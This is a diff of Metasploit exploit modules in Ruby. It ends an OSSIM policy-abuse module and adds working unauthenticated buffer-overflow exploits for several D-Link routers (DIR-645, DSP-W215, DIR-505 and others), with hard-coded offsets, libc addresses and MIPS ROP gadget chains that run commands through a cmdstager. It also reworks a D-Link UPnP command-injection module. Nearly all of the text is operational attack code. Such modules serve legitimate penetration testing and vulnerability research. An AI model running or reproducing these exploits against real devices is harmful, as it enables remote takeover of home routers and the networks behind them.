+        'tax_cat' => '0',
+        'tax_subc' => '0',
+        'mboxs[]' => '00000000000000000000000000000000',
+        'rep_act' => '0',
+        'rep_sev' => '1',
+        'rep_rel' => '1',
+        'rep_dir' => '0',
+        'ev_sev' => '1',
+        'ev_rel' => '1',
+        'tzone' => 'Europe/Amsterdam',
+        'date_type' => '1',
+        'begin_hour' => '0',
+        'begin_minute' => '0',
+        'begin_day_week' => '1',
+        'begin_day_month' => '1',
+        'begin_month' => '1',
+        'end_hour' => '23',
+        'end_minute' => '59',
+        'end_day_week' => '7',
+        'end_day_month' => '31',
+        'end_month' => '12',
+        'actions[]' => @action_id,
+        'sim' => '1',
+        'priority' => '1',
+        'qualify' => '1',
+        'correlate' => '0', # Don't make any correlations
+        'cross_correlate' => '0', # Don't make any correlations
+        'store' => '0' # We don't want to store anything :)
+      }
+    })
+
+    if res && res.code == 200
+      print_status("#{peer} - Created Policy [ #{policy} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
+    end
+
+    # Retrieve policy ID, needed for proper cleanup after succesful exploitation
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'ctx' => policy_ctx,
+        'group' => policy_group
+      },
+      'vars_post' => {
+        'page' => '1',
+        'rp' => '2000'
+      }
+    })
+    if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
+      @policy_id = $1
+      print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
+    end
+
+    # Reload the policies to make our new policy active
+    print_status("#{peer} - Reloading Policies")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'what' => 'policies',
+        'back' => '../policy/policy.php'
+      }
+    })
+
+    if res && res.code == 200
+      print_status("#{peer} - Policies reloaded!")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
+    end
+
+    # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
+    dont_exist = rand_text_alpha(8+rand(4))
+    print_status("#{peer} - Triggering policy and action by requesting a non existing url")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, dont_exist),
+      'cookie' => @cookie
+    })
+
+    if res and res.code == 404
+      print_status("#{peer} - Payload delivered")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Payload failed!")
+    end
+
+  end
+
+
+  def cleanup
+    begin
+      # Clean up, retrieve token so that the policy can be removed
+      print_status("#{peer} - Cleaning up")
+      res = send_request_cgi({
+       'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
+        'cookie' => @cookie,
+        'vars_post'   => { 'f_name' => 'delete_policy' }
+      })
+
+      if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
+        token = $1
+        print_status("#{peer} - Token [ #{token} ] retrieved")
+      else
+        print_warning("#{peer} - Unable to retrieve token")
+      end
+
+      # Remove our policy
+      res = send_request_cgi({
+       'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
+        'cookie' => @cookie,
+        'vars_get'   => {
+          'confirm' => 'yes',
+          'id' => @policy_id,
+          'token' => token
+        }
+      })
+
+      if res && res.code == 200
+        print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
+      else
+        print_warning("#{peer} - Unable to remove Policy ID")
+      end
+
+      # Remove our action
+      res = send_request_cgi({
+       'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
+        'cookie' => @cookie,
+        'vars_get'   => {
+          'id' => @action_id,
+        }
+      })
+
+      if res && res.code == 200
+        print_status("#{peer} - Action ID [ #{@action_id} ] removed")
+      else
+        print_warning("#{peer} - Unable to remove Action ID")
+      end
+
+    # Reload the policies to revert back to the state before exploitation
+    print_status("#{peer} - Reloading Policies")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'what' => 'policies',
+        'back' => '../policy/policy.php'
+      }
+    })
+
+    if res && res.code == 200
+      print_status("#{peer} - Policies reloaded!")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
+    end
+
+    ensure
+      super # mixins should be able to cleanup even in case of Exception
+    end
+  end
+
+end
diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
new file mode 100644
index 0000000000..4193a772b4
--- /dev/null
+++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link authentication.cgi Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an remote buffer overflow vulnerability on several D-Link routers.
+        The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
+        long password values. The vulnerability can be exploitable without authentication. This
+        module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
+        such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
+      },
+      'Author'         =>
+        [
+          'Roberto Paleari', # Vulnerability discovery
+          'Craig Heffner',   # also discovered the vulnerability / help with some parts of this module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_MIPSLE,
+      'References'     =>
+        [
+          ['OSVDB', '95951'],
+          ['EDB', '27283'],
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
+          ['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
+          ['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt']  #original advisory
+        ],
+      'Targets'        =>
+        [
+          [ 'D-Link DIR-645 1.03',
+            {
+              'Offset'      => 1011,
+              'LibcBase'    => 0x2aaf8000,    #Router
+              #'LibcBase'   => 0x40854000,    # QEMU environment
+              'System'      => 0x000531FF,    # address of system
+              'CalcSystem'  => 0x000158C8,    # calculate the correct address of system
+              'CallSystem'  => 0x000159CC,    # call our system
+            }
+          ]
+        ],
+      'DisclosureDate'  => 'Feb 08 2013',
+      'DefaultTarget'   => 0))
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'     => "/authentication.cgi",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Accessing the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :concat_operator => " && "
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    shellcode = rand_text_alpha_upper(target['Offset'])                  # padding
+    shellcode << [target['LibcBase'] + target['System']].pack("V")       # s0 - address of system
+    shellcode << rand_text_alpha_upper(16)                               # unused reg $s1 - $s4
+    shellcode << [target['LibcBase'] + target['CallSystem']].pack("V")   # s5 - second gadget (call system)
+
+        # .text:000159CC 10 00 B5 27    addiu   $s5, $sp, 0x170+var_160  # get the address of our command into $s5
+        # .text:000159D0 21 28 60 02    move    $a1, $s3                 # not used
+        # .text:000159D4 21 30 20 02    move    $a2, $s1                 # not used
+        # .text:000159D8 21 C8 00 02    move    $t9, $s0	         # $s0 - system
+        # .text:000159DC 09 F8 20 03    jalr    $t9	                 # call system
+        # .text:000159E0 21 20 A0 02    move    $a0, $s5	         # our cmd -> into a0 as parameter for system
+
+    shellcode << rand_text_alpha_upper(12)                               # unused registers $s6 - $fp
+    shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V")   # $ra - gadget nr 1 (prepare the parameter for system)
+
+        # .text:000158C8 21 C8 A0 02    move    $t9, $s5                 # s5 - our second gadget
+        # .text:000158CC 09 F8 20 03    jalr    $t9                      # jump the second gadget
+        # .text:000158D0 01 00 10 26    addiu   $s0, 1                   # s0 our system address - lets calculate the right address
+
+    shellcode << rand_text_alpha_upper(16)                               # filler in front of our command
+    shellcode << cmd
+  end
+
+  def execute_command(cmd, opts)
+    shellcode = prepare_shellcode(cmd)
+    uid = rand_text_alpha(4)
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => "/authentication.cgi",
+        'cookie'   => "uid=#{uid}",
+        'encode_params' => false,
+        'vars_post' => {
+          'uid'      => uid,
+          'password' => rand_text_alpha(3) + shellcode,
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
index 718bc25350..ecf3e45d65 100644
--- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
index 4928510332..55368e3c2a 100644
--- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
index a4bb691c6e..6781609aba 100644
--- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb
+++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb
new file mode 100644
index 0000000000..e20e9deb2f
--- /dev/null
+++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link info.cgi POST Request Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an anonymous remote code execution vulnerability on different D-Link
+        devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component,
+        when handling specially crafted POST HTTP requests addresses to the /common/info.cgi
+        handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
+        environment.
+      },
+      'Author'         =>
+        [
+          'Craig Heffner',   # vulnerability discovery and initial PoC
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_MIPSBE,
+      'References'     =>
+        [
+          ['OSVDB', '108249'],
+          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
+        ],
+      'Targets'        =>
+        [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+          [ 'D-Link DSP-W215 - v1.02',
+            {
+              'Offset' => 477472,
+              'Ret'    => 0x405cec # jump to system - my_cgi.cgi
+            }
+          ]
+        ],
+      'DisclosureDate' => 'May 22 2014',
+      'DefaultTarget' => 0))
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => "/common/info.cgi",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
+          @my_target = targets[1] if target['auto']
+          return Exploit::CheckCode::Appears
+        end
+
+        return Exploit::CheckCode::Detected
+      end
+
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    @my_target = target
+    check_code = check
+
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    if @my_target.nil? || @my_target['auto']
+      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
+    end
+
+    print_status("#{peer} - Exploiting #{@my_target.name}...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 185
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    buf = rand_text_alpha_upper(@my_target['Offset'])   # Stack filler
+    buf << [@my_target.ret].pack("N")                   # Overwrite $ra -> jump to system
+
+           # la $t9, system
+           # la $s1, 0x440000
+           # jalr $t9 ; system
+           # addiu $a0, $sp, 0x28 # our command
+
+    buf << rand_text_alpha_upper(40)                # Command to execute must be at $sp+0x28
+    buf << cmd                                      # Command to execute
+    buf << "\x00"                                   # NULL terminate the command
+  end
+
+  def execute_command(cmd, opts)
+    shellcode = prepare_shellcode(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method'        => 'POST',
+        'uri'           => "/common/info.cgi",
+        'encode_params' => false,
+        'vars_post'     => {
+          'storage_path' => shellcode,
+        }
+      }, 5)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb
new file mode 100644
index 0000000000..9752d22b0c
--- /dev/null
+++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link hedwig.cgi Buffer Overflow in Cookie Header',
+      'Description'    => %q{
+        This module exploits an anonymous remote code execution vulnerability on several D-Link
+        routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with
+        long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600
+        and the DIR645A1_FW103B11 firmware.
+      },
+      'Author'         =>
+        [
+          'Roberto Paleari', # Vulnerability discovery
+          'Craig Heffner',   # also discovered the vulnerability / help with some parts of this exploit
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['OSVDB', '95950'],
+          ['EDB', '27283'],
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
+          ['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
+          ['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt']  #original advisory
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_MIPSLE,
+      'Targets'        =>
+        [
+          [ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
+            {
+              'Offset'      => 973,
+              'LibcBase'    => 0x2aaf8000,    # Router
+              #'LibcBase'   => 0x40854000,    # QEMU environment
+              'System'      => 0x000531FF,    # address of system
+              'CalcSystem'  => 0x000158C8,    # calculate the correct address of system
+              'CallSystem'  => 0x000159CC,    # call our system
+            }
+          ]
+        ],
+      'DisclosureDate'  => 'Feb 08 2013',
+      'DefaultTarget'   => 0))
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'     => "/hedwig.cgi",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /unsupported HTTP request/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Accessing the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :concat_operator => " && "
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    shellcode = rand_text_alpha_upper(target['Offset'])                  # padding
+    shellcode << [target['LibcBase'] + target['System']].pack("V")       # s0 - address of system
+    shellcode << rand_text_alpha_upper(16)                               # unused reg $s1 - $s4
+    shellcode << [target['LibcBase'] + target['CallSystem']].pack("V")   # s5 - second gadget (call system)
+
+        # .text:000159CC 10 00 B5 27    addiu   $s5, $sp, 0x170+var_160  # get the address of our command into $s5
+        # .text:000159D0 21 28 60 02    move    $a1, $s3                 # not used
+        # .text:000159D4 21 30 20 02    move    $a2, $s1                 # not used
+        # .text:000159D8 21 C8 00 02    move    $t9, $s0                 # $s0 - system
+        # .text:000159DC 09 F8 20 03    jalr    $t9                      # call system
+        # .text:000159E0 21 20 A0 02    move    $a0, $s5                 # our cmd -> into a0 as parameter for system
+
+    shellcode << rand_text_alpha_upper(12)                               # unused registers $s6 - $fp
+    shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V")   # $ra - gadget nr 1 (prepare the parameter for system)
+
+        # .text:000158C8 21 C8 A0 02    move    $t9, $s5                 # s5 - our second gadget
+        # .text:000158CC 09 F8 20 03    jalr    $t9                      # jump the second gadget
+        # .text:000158D0 01 00 10 26    addiu   $s0, 1                   # s0 our system address - lets calculate the right address
+
+    shellcode << rand_text_alpha_upper(16)                               # filler in front of our command
+    shellcode << cmd
+  end
+
+  def execute_command(cmd, opts)
+    shellcode = prepare_shellcode(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => "/hedwig.cgi",
+        'cookie'   => "uid=#{shellcode}",
+        'encode_params' => false,
+        'vars_post' => {
+          rand_text_alpha(4) => rand_text_alpha(4)
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb
new file mode 100644
index 0000000000..7f924f2b56
--- /dev/null
+++ b/modules/exploits/linux/http/dlink_hnap_bof.rb
@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link HNAP Request Remote Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an anonymous remote code execution vulnerability on different
+        D-Link devices. The vulnerability is due to an stack based buffer overflow while
+        handling malicious HTTP POST requests addressed to the HNAP handler. This module
+        has been successfully tested on D-Link DIR-505 in an emulated environment.
+      },
+      'Author'         =>
+        [
+          'Craig Heffner', # vulnerability discovery and initial exploit
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_MIPSBE,
+      'References'     =>
+        [
+          ['CVE', '2014-3936'],
+          ['BID', '67651'],
+          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
+        ],
+      'Targets'        =>
+        [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+          [ 'D-Link DSP-W215 - v1.0',
+            {
+              'Offset'  => 1000000,
+              'Ret'     => 0x405cac, # jump to system - my_cgi.cgi
+            }
+          ],
+          [ 'D-Link DIR-505 - v1.06',
+            {
+              'Offset'  => 30000,
+              'Ret'     => 0x405234, # jump to system - my_cgi.cgi
+            }
+          ],
+          [ 'D-Link DIR-505 - v1.07',
+            {
+              'Offset'  => 30000,
+              'Ret'     => 0x405c5c, # jump to system - my_cgi.cgi
+            }
+          ]
+        ],
+      'DisclosureDate' => 'May 15 2014',
+      'DefaultTarget'  => 0))
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => "/HNAP1/",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        if res.body =~ /DIR-505/ && res.body =~ /1.07/
+          @my_target = targets[3] if target['auto']
+          return Exploit::CheckCode::Appears
+        elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
+          @my_target = targets[2] if target['auto']
+          return Exploit::CheckCode::Appears
+        elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
+          @my_target = targets[1] if target['auto']
+          return Exploit::CheckCode::Appears
+        else
+          return Exploit::CheckCode::Detected
+        end
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    @my_target = target
+    check_code = check
+
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
+    end
+
+    if @my_target.nil? || @my_target['auto']
+      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
+    end
+
+    print_status("#{peer} - Exploiting #{@my_target.name}...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 185
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    buf = rand_text_alpha_upper(@my_target['Offset'])  # Stack filler
+    buf << rand_text_alpha_upper(4)                    # $s0, don't care
+    buf << rand_text_alpha_upper(4)                    # $s1, don't care
+    buf << rand_text_alpha_upper(4)                    # $s2, don't care
+    buf << rand_text_alpha_upper(4)                    # $s3, don't care
+    buf << rand_text_alpha_upper(4)                    # $s4, don't care
+    buf << [@my_target.ret].pack("N")                  # $ra
+
+           # la $t9, system
+           # la $s1, 0x440000
+           # jalr $t9 ; system
+           # addiu $a0, $sp, 0x28 # our command
+
+    buf << rand_text_alpha_upper(40)                # Stack filler
+    buf << cmd                                      # Command to execute
+    buf << "\x00"                                   # NULL-terminate the command
+  end
+
+  def execute_command(cmd, opts)
+    shellcode = prepare_shellcode(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => "/HNAP1/",
+        'encode_params' => false,
+        'data' => shellcode
+      }, 5)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
index 27b6bc1e9e..ca3a22f56a 100644
--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -6,13 +6,10 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = AverageRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
-  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -20,202 +17,105 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description' => %q{
         Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
         interface. Since it is a blind OS command injection vulnerability, there is no
-        output for the executed command when using the CMD target. Additionally, a target
-        to deploy a native mipsel payload, when wget is available on the target device, has
-        been added. This module has been tested on DIR-865 and DIR-645 devices.
+        output for the executed command. This module has been tested on DIR-865 and DIR-645 devices.
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'OSVDB', '94924' ],
-          [ 'BID', '61005' ],
-          [ 'EDB', '26664' ],
-          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
+          ['OSVDB', '94924'],
+          ['BID', '61005'],
+          ['EDB', '26664'],
+          ['URL', 'http://www.s3cur1ty.de/m1adv2013-020']
         ],
       'DisclosureDate' => 'Jul 05 2013',
       'Privileged'     => true,
-      'Platform'       => %w{ linux unix },
       'Payload'        =>
         {
-          'DisableNops' => true,
+          'DisableNops' => true
         },
-      'Targets'        =>
+      'Targets' =>
         [
-          [ 'CMD',	#all devices
+          [ 'MIPS Little Endian',
             {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
             }
           ],
-          [ 'Linux mipsel Payload',	#DIR-865, DIR-645 and others with wget installed
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
             {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux'
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPS
             }
           ],
         ],
-      'DefaultTarget'  => 1
+      'DefaultTarget'    => 0
       ))
 
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+
     register_options(
       [
-        Opt::RPORT(49152),	#port of UPnP SOAP webinterface
-        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
-        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
+        Opt::RPORT(49152) # port of UPnP SOAP webinterface
       ], self.class)
   end
 
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/InternetGatewayDevice.xml'
+      })
+      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /<modelNumber>DIR-/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
   def exploit
-    @new_portmapping_descr = rand_text_alpha(8)
-    @new_external_port = rand(65535)
-    @new_internal_port = rand(65535)
+    print_status("#{peer} - Trying to access the device ...")
 
-    if target.name =~ /CMD/
-      exploit_cmd
-    else
-      exploit_mips
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
     end
+
+    print_status("#{peer} - Exploiting...")
+
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 400
+    )
   end
 
-  def exploit_cmd
-    if not (datastore['CMD'])
-      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-    end
-    cmd = payload.encoded
-    type = "add"
-    res = request(cmd, type)
-    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
